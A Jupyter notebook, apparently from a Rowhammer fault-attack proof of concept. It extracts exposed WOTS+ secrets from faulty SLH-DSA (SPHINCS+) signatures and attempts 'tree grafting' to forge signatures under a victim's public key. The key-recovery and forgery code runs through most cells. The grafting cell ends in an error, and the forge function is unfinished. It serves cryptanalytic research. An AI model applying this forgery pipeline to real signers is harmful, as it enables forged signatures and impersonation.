# Config

In [1]:
# Directory holding the key and signature dumps.
# Alternative location when analysing the SPHINCS+ reference victim:
#base = "../victims/sphincsplus/ref/"
base = "../"

# Input files: keys as "name: hex" lines, signatures as one hex string per line.
keys_file = f"{base}keys.txt"
sigs_file = f"{base}sigs.txt"
sigs_simulated_file = f"{base}sigs_simulated.txt"

# SLH-DSA (FIPS 205) parameter set of the victim.
params = 'SLH-DSA-SHAKE-256s'

# Feature switches
sanity_check = True      # re-sign sigs[0] and compare it byte for byte
simulate_faults = False  # merge simulated faulty signatures from sigs_simulated_file
filter_sigs = True       # write the kept signatures to a filtered signature file
use_pickle = True        # cache expensive intermediate results in .pkl files

# Setup

Install dependencies and define helper functions.

In [2]:
# Install the packages listed in requirements.txt into the kernel's environment
# (%pip rather than !pip targets the running kernel), then record the interpreter version.
%pip install -r requirements.txt
!python --version


[1m[[0m[34;49mnotice[0m[1;39;49m][0m[39;49m A new release of pip is available: [0m[31;49m25.0.1[0m[39;49m -> [0m[32;49m25.1.1[0m
[1m[[0m[34;49mnotice[0m[1;39;49m][0m[39;49m To update, run: [0m[32;49mpip install --upgrade pip[0m
Note: you may need to restart the kernel to use updated packages.
Python 3.10.12


In [3]:
import fips205

In [4]:
# Instantiate the parameter set and cache the FIPS 205 sizes used throughout the notebook:
# a (FORS tree height), d (hypertree layers), hp (XMSS tree height h'), n (hash bytes), k (FORS trees).
slh = fips205.SLH_DSA(params)
a, d, hp, n, k = slh.a, slh.d, slh.hp, slh.n, slh.k

In [5]:
def print_adrs(adrs: fips205.ADRS, end='\n', verbose=False):
    """Print an ADRS as space-separated 8-hex-digit words.

    With ``verbose`` a column header (LAYER, TREE ADDR, TYP, KADR, PADD) is
    printed first. The address line is followed by one space and then ``end``.
    """
    adrs_hex = adrs.adrs().hex()
    if verbose:
        columns = (('LAYER', 4), ('TREE ADDR', 18), ('TYP', 6), ('KADR', 5), ('PADD = 0', 0))
        print(''.join(label + ' ' * pad for label, pad in columns))
    words = [adrs_hex[pos:pos + 8] for pos in range(0, len(adrs_hex), 8)]
    print(' '.join(words), end=' ')
    print(end=end)

In [6]:
import os

def pickle_load(filename: str, or_else):
    """Return the object cached in ``filename``, computing it when necessary.

    - pickling disabled (``use_pickle`` false): return ``or_else()``;
    - pickling enabled, file missing: compute and cache via ``pickle_store``;
    - pickling enabled, file present: unpickle and return it.

    Only load cache files written by this notebook: unpickling can execute arbitrary code.
    """
    if not use_pickle:
        print(f"Pickle loading is disabled, using fallback.")
        return or_else()

    import pickle
    if not os.path.exists(filename):
        print(f"File {filename} not found, creating new one.")
        return pickle_store(filename, or_else)

    print(f"Loading pickle from {filename}.")
    with open(filename, 'rb') as f:
        return pickle.load(f)
    
def pickle_store(filename: str, fn):
    """Evaluate ``fn()`` and, when ``use_pickle`` is set, cache the result in ``filename``.

    The pickle is written to a temporary file in the destination directory and
    then moved into place with ``os.replace``. An interrupted dump (e.g. a kernel
    interrupt while pickling a large result) therefore cannot leave a truncated
    cache file behind that ``pickle_load`` would later fail to read.

    Returns:
        The value produced by ``fn()``.
    """
    if not use_pickle:
        print(f"Pickle storing is disabled, not saving {filename}.")
        return fn()

    import os
    import pickle
    import tempfile

    value = fn()
    directory = os.path.dirname(os.path.abspath(filename))
    fd, tmp_path = tempfile.mkstemp(dir=directory, prefix=os.path.basename(filename) + ".", suffix=".tmp")
    try:
        with os.fdopen(fd, 'wb') as f:
            pickle.dump(value, f)
        os.replace(tmp_path, filename)
    except BaseException:
        # Drop the partial temporary file, then propagate the original error.
        try:
            os.unlink(tmp_path)
        except OSError:
            pass
        raise
    return value

In [7]:
from os import cpu_count


def extract_wots_keys(pk: bytes, sigs: list[bytes]) -> dict[fips205.ADRS, set[fips205.WOTSKeyData]]:
    """Extract WOTS+ key data from every signature and group it by address.

    Each signature is handed to ``cryptanalysis_lib.process_sig`` in a worker
    process together with its index and the SLH-DSA signature length
    ``sig_len``. The per-signature dictionaries (ADRS -> set of keys) are then
    merged with ``merge_groups``.

    Args:
        pk: the SLH-DSA public key.
        sigs: raw signatures as read from the signature file.

    Returns:
        dict mapping each ADRS to the set of WOTS key data found at that address.
    """
    import multiprocessing
    from cryptanalysis_lib import process_sig
    wots_bytes = slh.len * n
    xmss_bytes = hp * n
    fors_bytes = k * (n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    # Leave one core free, but never request zero workers: Pool(processes=0)
    # raises ValueError on single-core machines, and cpu_count() may return None.
    num_workers = max(1, (cpu_count() or 1) - 1)
    args = [(params, pk, sig_idx, sig, sig_len) for sig_idx, sig in enumerate(sigs)]
    with multiprocessing.Pool(processes=num_workers) as pool:
        results = pool.map(process_sig, args)

    # Merge the per-signature results into one ADRS -> keys mapping.
    merged = {}
    for item in results:
        merged = merge_groups(merged, item)
    return merged

def merge_groups(left: dict[fips205.ADRS, set], right: dict[fips205.ADRS, set]) -> dict[fips205.ADRS, set]:
    """Union ``right`` into ``left`` address by address and return ``left``.

    ``left`` is updated in place. For each address in ``right`` its entry in
    ``left`` is replaced by a *new* set holding the union of both sides, so the
    sets of ``right`` are never aliased.
    """
    for adrs, extra in right.items():
        left[adrs] = left.get(adrs, set()) | extra
    return left


In [8]:
from typing import Generator


def shared_intermediates(v1: fips205.WOTSKeyData, valid: fips205.WOTSKeyData) -> list[tuple[int, int]]:
    """Find hash-chain values of ``v1`` that coincide with ``valid``'s signature.

    For every chain ``chain_idx`` in ``v1.intermediates`` and every hash
    iteration ``hash_iter >= 1`` of that chain, the intermediate value is
    compared with the ``chain_idx``-th n-byte block of ``valid.sig``. Each match
    is reported as a ``(chain_idx, hash_iter)`` pair.

    Returns:
        A list of matches. The list is empty when nothing matches, when either
        key has no intermediates, or when both keys are equal. Being a list
        (falsy when empty) it works both in boolean context
        (``if shared_intermediates(a, b): ...``) and in ``for`` loops. A
        generator would always be truthy, which made boolean checks meaningless.
    """
    if not v1.intermediates or not valid.intermediates or v1 == valid:
        return []
    matches = []
    for chain_idx, chain in enumerate(v1.intermediates):
        if not chain:
            continue
        # Block of the valid WOTS signature that belongs to this chain.
        expected = valid.sig[chain_idx * n:(chain_idx + 1) * n]
        for hash_iter, step in enumerate(chain[1:], start=1):
            if step == expected:
                matches.append((chain_idx, hash_iter))
    return matches
    

def find_collisions(wots_sigs: dict[fips205.ADRS, set[fips205.WOTSKeyData]]) -> dict[fips205.ADRS, set[fips205.WOTSKeyData]]:
    """Keep only addresses with mixed keys: at least one valid key and at least one key whose ``valid`` is falsy."""
    collisions = {}
    for adrs, keys in wots_sigs.items():
        has_valid = any(key.valid for key in keys)
        if has_valid and not all(key.valid for key in keys):
            collisions[adrs] = keys
    return collisions

def print_arr_w(arr: list[int], width: int = 2):
    """Print ``arr`` as ``[ a b c ]`` with every element zero-padded to ``width`` digits.

    The default used to be the type object ``int`` (``width=int``), which
    produced an invalid format spec whenever ``width`` was omitted.
    """
    cells = ''.join(f"{x:0{width}d} " for x in arr)
    print('[ ' + cells + ']')
    
def valid_sigs_d(groups):
    """Map each address to its valid key.

    Keys whose ``valid`` attribute is falsy are ignored, and addresses without
    a valid key are absent from the result. If an address has several valid
    keys, the one iterated last wins.
    """
    result = {}
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                result[adrs] = key
    return result

def hex(s: bytes | None) -> str:
    return s.hex() if s else "None"

def print_key_data(v: fips205.WOTSKeyData, adrs: fips205.ADRS, pk_seed: bytes, valid_key: fips205.WOTSKeyData = None, indent=''):
    """Pretty-print one WOTS key.

    Prints:
    - its validity status (Valid / Invalid / "--" when ``valid`` is neither);
    - a signature prefix;
    - the stored and recalculated public keys;
    - the source signature index;
    - the chain and recalculated-chain step arrays.

    If ``valid_key`` is given and ``v`` is not valid, every intermediate shared
    with ``valid_key`` is listed as well.
    """
    if v.valid:
        status = "Valid"
    elif v.valid == False:  # distinguishes False from None ("unknown")
        status = "Invalid"
    else:
        status = "--"
    print(indent + status, end='\t')
    print(indent + v.sig.hex()[:128] + '...')
    print(indent + '\tPK (from tree)\t' + hex(v.pk))
    print(indent + '\tPK (calculated)\t' + hex(v.calculate_pk(params, adrs, pk_seed)))
    print(indent + f"\tWOTS key is part of signature {v.sig_idx}")

    # Header row with chain indices, then the step values per chain.
    print(indent + '\t\t\t', end='')
    print_arr_w(list(range(len(v.chains))), 2)
    print(f"{indent}\tchains\t\t", end='')
    print_arr_w(v.chains, 2)
    print(f"{indent}\tchains (calc)\t", end='')
    print_arr_w(v.chains_calculated, 2)

    if not valid_key or v.valid:
        return
    for chain_idx, exposed in shared_intermediates(v, valid_key):
        print(f"{indent}\t\tExposed {exposed} secret values at chain_idx {chain_idx}")
    

def print_groups(pk_seed: bytes, groups: dict[fips205.ADRS, list[fips205.WOTSKeyData]], skip_no_exposed=True):
    """Print every address group, sorted by layer, with its valid and non-valid keys.

    For each group this prints:
    - the address;
    - the number of keys;
    - the valid key, followed by every key whose ``valid`` is falsy, via
      ``print_key_data``.

    With ``skip_no_exposed`` (default) a non-valid key is only shown when it
    shares at least one intermediate chain value with the group's valid key.
    """
    valid_sigs = valid_sigs_d(groups)

    for adrs, value in sorted(groups.items(), key=lambda item: item[0].get_layer_address()):
        valid_sig = valid_sigs.get(adrs)
        invalid_sigs = [v for v in value if not v.valid]
        print_adrs(adrs, end='', verbose=True)
        print(len(value))

        for v in [valid_sig] + invalid_sigs:
            if not v:
                continue
            if skip_no_exposed and not v.valid:
                # any() forces evaluation: a generator object is always truthy.
                # Without a valid key in the group, nothing can be exposed.
                if valid_sig is None or not any(shared_intermediates(v, valid_sig)):
                    continue
            print_key_data(v, adrs, pk_seed, valid_sig, indent='\t')

# Clean Start

Run this cell and all cells below it for a clean analysis.

In [9]:
# Reset the per-address WOTS key groups (ADRS -> set of keys) for a clean analysis.
groups: dict[fips205.ADRS, set[fips205.WOTSKeyData]] = dict()

In [10]:
# Load the key pair from keys_file: one "name: hex" entry per line (needs `sk` and `pk`).
with open(keys_file, "r") as f:
    keys = {}
    for line in f:
        if not line.strip():
            continue  # tolerate blank lines, e.g. an empty trailing line
        name, value = line.split(': ', 1)
        keys[name] = bytes.fromhex(value.strip())
sk = keys['sk']
pk = keys['pk']
pk_seed = pk[:n]  # FIPS 205: PK = PK.seed || PK.root, each n bytes
pk.hex()

'0bc005bdb4dfb431bb250e109ca4430d42f4fd7e9270f515640701df308413952d854a500f3e893a8804ad88a600ee6812c3317e422848c5854c2b18588c1b9a'

# Update Experiment
Run this cell and all cells below it to process new signatures.

# Load real signatures

This loads the real signatures from `sigs_file` (see config)

In [11]:
def load_groups():
    """Read ``sigs_file`` (one hex signature per line) and group its WOTS keys.

    Blank lines are skipped; ``bytes.fromhex("")`` would otherwise add an empty
    "signature".

    Returns:
        ``(sigs, groups)``: the list of raw signatures and the ADRS -> keys
        mapping produced by ``extract_wots_keys``.
    """
    with open(sigs_file, "r") as f:
        sigs = [bytes.fromhex(line.strip()) for line in f if line.strip()]
    print(f"Processing {len(sigs)} signatures...", end=' ')
    groups = extract_wots_keys(pk, sigs)
    return sigs, groups

# Cached in sigs_groups.pkl; delete that file to re-process sigs_file.
sigs, groups = pickle_load("sigs_groups.pkl", load_groups)
total_sigs = sum(map(len, groups.values()))
print(f"Loaded {len(sigs)} signatures in {len(groups)} groups")
print(f"Total signatures in groups: {total_sigs}")

Loading pickle from sigs_groups.pkl.
Loaded 29065 signatures in 198057 groups
Total signatures in groups: 200596


# Load simulated faulty signatures
This section loads simulated faulty signatures from `sigs_simulated_file` (only when `simulate_faults` is enabled).

In [12]:
import os
# Merge simulated faulty signatures into the groups, if enabled and the file exists.
if simulate_faults and os.path.exists(sigs_simulated_file):
    with open(sigs_simulated_file, "r") as f:
        faulty_sigs = [bytes.fromhex(line.strip()) for line in f if line.strip()]
    print(f"Loaded {len(faulty_sigs)} faulty (simulated) signatures")
    # NOTE(review): sig_idx of these keys presumably indexes faulty_sigs, not sigs;
    # later lookups of sigs[key.sig_idx] would then pick the wrong signature.
    simulated_groups = extract_wots_keys(pk, faulty_sigs)
    for keys in simulated_groups.values():
        for key in keys:
            key.simulated = True
    groups = merge_groups(groups, simulated_groups)
else:
    print("Fault simulation disabled or no simulated faulty signatures found")

Fault simulation disabled or no simulated faulty signatures found


# Tooling sanity check

This section re-generates the first signature in `sigs_file` using the same key and randomizer $R$, and checks that the result matches it byte for byte.
This assumes that the first signature in `sigs_file` is valid (fault-free).

In [13]:
if sanity_check:
    # Signature layout (FIPS 205): R || SIG_FORS || SIG_HT, followed here by the signed message.
    wots_len = slh.len
    wots_bytes = wots_len * n
    xmss_bytes = hp * n
    fors_bytes = k*(n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    sig = sigs[0]

    m = sig[sig_len:]
    r = sig[:n]
    # Re-sign with the same R; a fault-free signer must reproduce sigs[0] exactly.
    pysig = slh.slh_sign_internal(m, sk, None, r=r, stop_at=None)
    pysig += m

    if pysig != sig:
        print("Signature mismatch")
        print(pysig.hex())
        print(sig.hex())
        # Previously this fell through and still reported success.
        raise AssertionError("Sanity check failed: re-computed signature differs from sigs[0]")
    print("Passed sanity check")
else:
    print("Skipping sanity check")

LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000000 00000000 002ba2a1 6debacce 00000002 00000000 00000000 000000b3 
00000001 00000000 00002ba2 a16debac 00000002 00000000 00000000 000000ce 
00000002 00000000 0000002b a2a16deb 00000002 00000000 00000000 000000ac 
00000003 00000000 00000000 2ba2a16d 00000002 00000000 00000000 000000eb 
00000004 00000000 00000000 002ba2a1 00000002 00000000 00000000 0000006d 
00000005 00000000 00000000 00002ba2 00000002 00000000 00000000 000000a1 
00000006 00000000 00000000 0000002b 00000002 00000000 00000000 000000a2 
Passed sanity check


# Extract WOTS keys

Extract all WOTS keys from all signatures. The optional cell below plots the distribution of chain steps over the valid keys.

In [14]:
if False:
    # get distribution of steps in (valid) signatures
    distr = [[0 for _ in range(16)] for _ in range(67)]
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                for chain_idx, chain in enumerate(key.chains):
                        distr[chain_idx][chain] += 1           
    distr

    %pip install matplotlib
    import matplotlib.pyplot as plt

    # distr is your 67×16 list of counts
    # e.g. distr = [[…], …, […]]

    plt.figure(figsize=(8, 10))
    plt.imshow(distr, aspect='auto')        # default colormap
    plt.colorbar(label='Count')              # show scale
    plt.xlabel('Step value (0–15)')
    plt.ylabel('Chain index (0–66)')
    plt.title('Distribution of steps in valid signatures')
    plt.tight_layout()
    plt.show()

# Group Collisions

Groups of colliding WOTS keys (same address, with at least one valid and one invalid key) appear here.

In [15]:
# Sanity check: an address must never carry more than one valid WOTS key.
for adrs, keys in groups.items():
    if sum(1 for v in keys if v.valid) <= 1:
        continue
    print("ERROR: found multiple valid keys for the same address", adrs, keys)
    raise ValueError("Multiple valid keys for the same address")

In [16]:
# Address -> valid WOTS key, computed over all layers before any filtering below.
valid_sigs = valid_sigs_d(groups=groups)

In [17]:
# Restrict the analysis to a single hypertree layer.
# NOTE(review): 7 == d - 1 (the top layer) for SLH-DSA-SHAKE-256s; confirm this is
# the intended layer before switching parameter sets.
target_layer = 7
groups = {
    adrs: keys
    for adrs, keys in groups.items()
    if adrs.get_layer_address() == target_layer and len(keys) > 0
}
print(f"Found {len(groups)} groups at layer {target_layer}")

# Keep only addresses with both a valid and a non-valid key.
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with collisions")

Found 256 groups at layer 7
Found 217 groups with collisions


In [18]:
# Post-process the colliding WOTS keys.
def calc_intermediates():
    """Compute hash-chain intermediates for every key in the global ``groups``.

    Each key is processed against the valid key of its address; addresses
    without a valid key are skipped. Keys are updated in place, and ``groups``
    is returned so the result can be pickled.
    """
    for adrs, keys in groups.items():
        if adrs in valid_sigs:
            reference = valid_sigs[adrs]
            for key in keys:
                key.calculate_intermediates(params, adrs, pk_seed, reference)
    return groups
        
# Cached in groups_intermediates.pkl. The file name is fixed (not keyed on
# target_layer), so delete it after changing the filters above.
groups = pickle_load("groups_intermediates.pkl", calc_intermediates)
print("Calculated intermediates for {} groups".format(len(groups)))

Loading pickle from groups_intermediates.pkl.
Calculated intermediates for 217 groups


In [19]:
# Optionally export the signatures of colliding keys, split by whether every
# recalculated chain value equals 7. Guarded by a flag so that, when disabled,
# the output files are not opened at all (opening with "w" truncates them).
export_wots7 = False
all_7_indices = set()
if export_wots7:
    with open("sigs_wots7.txt", "w") as f, open("sigs_not_wots7.txt", "w") as f_not:
        for adrs, keys in groups.items():
            for key in keys:
                out = f if all(c == 7 for c in key.chains_calculated) else f_not
                out.write(f"{sigs[key.sig_idx].hex()}\n")

# Drop keys whose recalculated chains expose no WOTS secret values, then re-apply
# the collision filter (each address still needs a valid and a non-valid key).
# NOTE(review): with w = 16 the chain values are presumably always < 17, which would
# make this a no-op (217 -> 217 groups above); confirm the intended threshold/sentinel.
groups = {
    adrs: [key for key in keys if any(step < 17 for step in key.chains_calculated)]
    for adrs, keys in groups.items()
}
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with at least one WOTS secret")

Found 217 groups with at least one WOTS secret


In [20]:
#print_groups(pk_seed, groups)

In [21]:
def filter_signatures(sigs: list[bytes], wots_keys: dict[fips205.ADRS, set[fips205.WOTSKeyData]]) -> set[bytes]:
    """Select the signatures worth keeping for further analysis.

    Only addresses with both a valid and a non-valid key are considered
    (``find_collisions``). A signature is kept when its key is the valid one,
    or when its key shares at least one intermediate chain value with the
    address's valid key, i.e. it exposes WOTS secret values.

    Returns:
        The set of kept raw signatures (``sigs[key.sig_idx]``).
    """
    kept = set()
    valid_by_adrs = valid_sigs_d(wots_keys)
    for adrs, keys in find_collisions(wots_keys).items():
        valid_key = valid_by_adrs.get(adrs)
        for key in keys:
            # any() forces evaluation: a generator object would always be truthy.
            if key.valid or (valid_key is not None and any(shared_intermediates(key, valid_key))):
                kept.add(sigs[key.sig_idx])
    return kept

if filter_sigs:
    # only keep signatures that are valid or have exposed WOTS keys
    filtered_sigs = filter_signatures(sigs, groups)
    print(f"Kept {len(filtered_sigs)} of {len(sigs)} signatures")
    # Written next to the other inputs (`base` from the config cell). Sorted so
    # the file is identical across runs: set order of bytes depends on the hash seed.
    with open(base + "sigs_filtered.txt", "w") as f:
        for sig in sorted(filtered_sigs):
            f.write(sig.hex() + "\n")

Kept 446 of 29065 signatures


# Combine WOTS Keys
This section combines the colliding keys of each address into a single WOTS key.

In [22]:
# Keep only groups in which some non-valid key really exposes WOTS secrets, i.e.
# shares at least one intermediate chain value with the address's valid key.
# any() forces evaluation: a generator object would always be truthy.
groups = {
    adrs: keys
    for adrs, keys in groups.items()
    if any(not key.valid and any(shared_intermediates(key, valid_sigs[adrs])) for key in keys)
}
print(f"Found {len(groups)} groups with exposed WOTS secrets")
#print_groups(pk_seed, groups)

Found 217 groups with exposed WOTS secrets


In [23]:
# Join WOTS keys to get a WOTS key usable for signing as many messages as possible
from copy import deepcopy

def join_sigs(wots_keys: dict[fips205.ADRS, set[fips205.WOTSKeyData]], params, pk_seed) -> dict[fips205.ADRS, fips205.WOTSKeyData]:
    """Combine all keys of each address into one key, starting from the valid key.

    For every address with at least two keys *and* a valid key, a deep copy of
    the valid key is successively ``join``-ed with every key of the group.
    Addresses without a valid key are skipped, since there is nothing to start from.

    Returns:
        dict mapping ADRS -> joined key.
    """
    joined_sigs = {}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in wots_keys.items():
        if len(keys) < 2 or adrs not in valid_sigs:
            continue
        # Work on a copy: calculate_intermediates below updates the key in place.
        retval = deepcopy(valid_sigs[adrs])
        if not retval.chains_calculated:
            print_adrs(adrs)  # report addresses whose intermediates were missing
            retval.calculate_intermediates(params, adrs, pk_seed, valid_sigs[adrs])
        for key in keys:
            retval = retval.join(key, params)
        joined_sigs[adrs] = retval
    return joined_sigs

joined_sigs = join_sigs(wots_keys=groups, params=params, pk_seed=pk_seed)
print("Joined {} signatures".format(len(joined_sigs)))

#for adrs, key in joined_sigs.items():
#    print_adrs(adrs, verbose=True)
#    print_key_data(key, adrs, pk_seed, None)

# Filter out signatures with all chains set to 0
#joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if any(c > 0 for c in key.chains_calculated)}
#print(f"Filtered {len(joined_sigs)} (wildcard chains)")

Joined 217 signatures


In [24]:
# Rank joined keys by how much of their chains is usable: each chain contributes
# w - c for its recalculated step c (presumably the lowest known step of that chain).
def score(key: fips205.WOTSKeyData) -> int:
    """Return the sum of ``slh.w - c`` over all recalculated chain steps ``c`` of ``key``."""
    total = 0
    for step in key.chains_calculated:
        total += slh.w - step
    return total
# Pick the joined key with the highest score and show it next to all original keys of its address.
most_exposed_adrs, most_exposed_key = max(joined_sigs.items(), key=lambda entry: score(entry[1]))
print(f"Key with most exposed chains (score: {score(most_exposed_key)}):")
print_adrs(most_exposed_adrs, verbose=True)
print_key_data(most_exposed_key, most_exposed_adrs, pk_seed, None)

print("=" * 64)
print("All keys for exposed address:")
print_adrs(most_exposed_adrs, verbose=True)
for key in groups[most_exposed_adrs]:
    print_key_data(key, most_exposed_adrs, pk_seed, valid_sigs[most_exposed_adrs])

Key with most exposed chains (score: 1072):
LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000007 00000000 00000000 00000000 00000001 000000ff 00000000 00000000 
--	0e20b354f20e056c26cf6ecdc070a059dc72c69e5be2a3a7e6b9c0097052013fb150c1b77c8d921b44c438b963b9c5e0dcb1d92ea08c845c23f3139e6b39ccbc...
	PK (from tree)	None
	PK (calculated)	520887e8e95bbaa97f7f4a372f0c3e37bcd045efbe1239e7518cb43a746ef335
	WOTS key is part of signature None
			[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ]
	chains		[ 09 07 11 14 10 05 09 03 03 05 15 08 13 01 03 09 04 06 00 04 12 01 00 01 10 08 14 02 04 10 10 04 05 06 01 02 04 11 10 03 11 14 15 03 04 02 01 08 04 10 15 09 00 09 14 05 00 07 10 13 00 01 02 15 02 01 03 ]
	chains (calc)	[ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

In [25]:
# Fraction of messages signable with a key, ignoring the checksum chains.
import math


def num_signable_messages(key: fips205.WOTSKeyData) -> float:
    """Estimate the fraction of messages signable with ``key`` (checksum chains ignored).

    Only the first ``slh.len1`` (message) chains are considered. A chain whose
    recalculated step ``c`` is below ``w - 1`` contributes a factor
    ``(w - 1 - c) / (w - 1)``; chains with ``c >= w - 1`` contribute 1.
    Despite its name, this returns a float fraction. It was annotated
    ``-> int`` but has always returned ``num_sign / (w - 1) ** len1``.

    NOTE(review): c == w - 2 contributes 1/(w - 1) while c == w - 1 contributes 1;
    confirm that w - 1 is meant as a "no constraint" sentinel.
    """
    num_sign = 1
    for i in range(slh.len1):
        if key.chains_calculated[i] < slh.w - 1:
            num_sign *= (slh.w - 1 - key.chains_calculated[i])
    # Exact integer product first, a single division at the end.
    return num_sign / ((slh.w - 1) ** slh.len1)
num_signable = num_signable_messages(most_exposed_key)
# Mean number of independent attempts until one succeeds with probability num_signable.
expected_reps = 1 / num_signable
print("Fraction of signable messages: {}".format(num_signable))
print("Expected number of repetitions until a valid signature is found: 2**{}".format(math.log2(expected_reps)))

Fraction of signable messages: 1.0
Expected number of repetitions until a valid signature is found: 2**0.0


In [26]:
# sign a random message with the exposed key
#msg = bytes.fromhex('bc9c6c7892ac9aa558a7ee5ef40a50bed3796a3cc657e88c6cedec7ddffbdad2')
#assert most_exposed_key.try_sign(msg, most_exposed_adrs, pk_seed, params)

# Tree Grafting

In [27]:
# Reload the helper module so edits to cryptanalysis_lib.py are picked up without restarting the kernel.
import cryptanalysis_lib as clib
import importlib
importlib.reload(clib)

<module 'cryptanalysis_lib' from '/home/jb/rowhammer-jb/bs-poc/tools/cryptanalysis_lib.py'>

In [28]:
#%timeit clib.sign_worker((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

In [29]:
#%timeit clib.sign_worker_xmss((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

In [30]:
#%timeit clib.sign_worker_xmss_c((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

In [31]:
import math
from multiprocessing import Pool
from os import cpu_count

import concurrent

def sign_message_batch_mp(total_msgs, adrs, key, pk_seed, params, num_procs=None):
    """
    Use a process pool to sign `total_msgs` messages *per* (adrs,key).
    Returns the first successful message signed by any process.

    The work is split into ``num_procs`` chunks of ``ceil(total_msgs / num_procs)``
    messages. Each chunk is one call of
    ``clib.sign_worker_xmss_c((per_proc, adrs_copy, key, pk_seed, params))``.
    The first truthy worker result is returned and pending chunks are
    cancelled; None is returned if no worker succeeds. Worker exceptions are
    printed and otherwise ignored.

    Args:
        num_procs: number of worker processes and chunks. Defaults to the CPU
            count; values below 1 are clamped to 1.
    """
    import concurrent.futures  # `import concurrent` alone does not load the submodule

    if num_procs is None:
        num_procs = cpu_count() or 1
    # cpu_count()-1 is 0 on a single-core machine; avoid a ZeroDivisionError below.
    num_procs = max(1, num_procs)

    # Split total_msgs into roughly equal chunks per process
    per_proc = math.ceil(total_msgs / num_procs)
    print("Total messages per process:", per_proc)

    # One work item per process; each gets its own copy of the address.
    work = [(per_proc, adrs.copy(), key, pk_seed, params) for _ in range(num_procs)]

    # Honour num_procs: a bare ProcessPoolExecutor() would use every CPU.
    with concurrent.futures.ProcessPoolExecutor(max_workers=num_procs) as executor:
        futures = [executor.submit(clib.sign_worker_xmss_c, item) for item in work]
        for future in concurrent.futures.as_completed(futures):
            try:
                result = future.result()
            except Exception as e:
                print("Error:", e)
                continue
            if result:
                # Only not-yet-started futures can be cancelled; leaving the
                # `with` block still waits for chunks that are already running.
                for f in futures:
                    f.cancel()
                return result
    return None

# Refuse to start when the expected number of signing attempts is impractical.
# NOTE(review): the 2**29 budget is a magic number; consider moving it to the config cell.
if expected_reps > 2**29:
    raise ValueError("Expected repetitions are too high, aborting")
num_sigs = 10

print(f"Signing {num_sigs} messages")
# FIXME: the last run failed here with "not enough values to unpack (expected 4, got 3)":
# sign_message_batch_mp returns clib.sign_worker_xmss_c's result, which yields 3 values.
# It also returns None when no worker succeeds. Align this unpacking with the worker's
# actual return tuple. Note: num_procs=cpu_count()-1 is 0 on a single-core machine.
xmss_pk, adrs, sk_seed, key  = sign_message_batch_mp(num_sigs, most_exposed_adrs, most_exposed_key, pk_seed, params, num_procs=cpu_count()-1)
print("Successfully grafted tree for XMSS PK " + xmss_pk.hex())
print("Address")
print_adrs(adrs, verbose=True)
print("SK seed:", sk_seed.hex())
print("PK seed:", pk_seed.hex())
print("Key:", key)

Signing 10 messages
Total messages per process: 4


ValueError: not enough values to unpack (expected 4, got 3)

In [None]:
# Reload fips205 so edits to the library are picked up without restarting the kernel.
# NOTE(review): objects created before the reload (e.g. `slh`, the ADRS/WOTSKeyData
# instances in `groups`) still belong to the old module's classes.
import importlib
importlib.reload(fips205)

def forge(valid_sig: bytes, sk: bytes, pk: bytes, adrs: fips205.ADRS, key: fips205.WOTSKeyData, m: bytes, params: str):
    """Forge a signature on ``m`` by grafting a subtree under the exposed WOTS key.

    The signature is assembled from three parts:
    - layers below ``target_layer`` are signed with ``sk`` (the grafted key material);
    - the WOTS signature at ``target_layer`` comes from ``key.try_sign``;
    - everything above it is copied from ``valid_sig``, a genuine signature
      (without appended message) that contains the valid key at ``adrs``.

    Args:
        valid_sig: genuine signature bytes (without the message).
        sk: secret key for the bottom layers.
        pk: victim public key (PK.seed || PK.root).
        adrs: address of the exposed WOTS key at ``target_layer``.
        key: exposed/joined WOTS key.
        m: message to sign.
        params: SLH-DSA parameter-set name.

    Returns:
        The forged signature bytes (without the message).
    """
    slh = fips205.SLH_DSA(params)
    n = slh.n
    pk_seed = pk[:n]
    pk_root = pk[n:]

    # Sizes for *this* parameter set rather than the notebook-level globals.
    wots_bytes = slh.len * n
    xmss_bytes = slh.hp * n
    fors_bytes = slh.k * (n + slh.a * n)
    sig_len = n + fors_bytes + slh.d * (wots_bytes + xmss_bytes)
    # Reuse everything after the WOTS signature at target_layer: its XMSS auth path
    # and all higher layers. For target_layer == d - 1 this is the top auth path only.
    top_start = n + fors_bytes + target_layer * (wots_bytes + xmss_bytes) + wots_bytes
    top_part = valid_sig[top_start:sig_len]

    # H_msg must use the victim's PK.root. NOTE(review): assumes slh_sign_internal
    # reads PK.root from sk[3n:] (FIPS 205 layout SK.seed||SK.prf||PK.seed||PK.root) — confirm.
    sk = sk[:3 * n] + pk_root

    hp_mask = (1 << slh.hp) - 1
    while True:
        # Draw R so that the digest routes through the exposed key pair at target_layer.
        r = os.urandom(n)
        digest = slh.h_msg(r, pk_seed, pk_root, m)
        (_, i_tree, i_leaf) = slh.split_digest(digest)
        # FIPS 205 ht_sign: for j = 1..target_layer, i_leaf = i_tree mod 2^h', i_tree >>= h'.
        for _ in range(target_layer):
            i_leaf = i_tree & hp_mask
            i_tree >>= slh.hp
        # Only the key-pair index is compared; the tree address is assumed to match,
        # which always holds at the top layer (a single tree).
        if i_leaf != adrs.get_key_pair_address():
            continue
        # Sign layers 0..target_layer-1, forcing the same R (as in the sanity check)
        # so that the digest computed above is the one actually used.
        bottom_part, root = slh.slh_sign_internal(m, sk, None, r=r, stop_at=target_layer - 1)
        forged_sig = key.try_sign(root, adrs, pk_seed, params)
        if forged_sig:
            break
        # The exposed key cannot sign this root; a fresh R yields a different root.
    print(len(bottom_part))
    print(len(forged_sig))
    print(len(top_part))
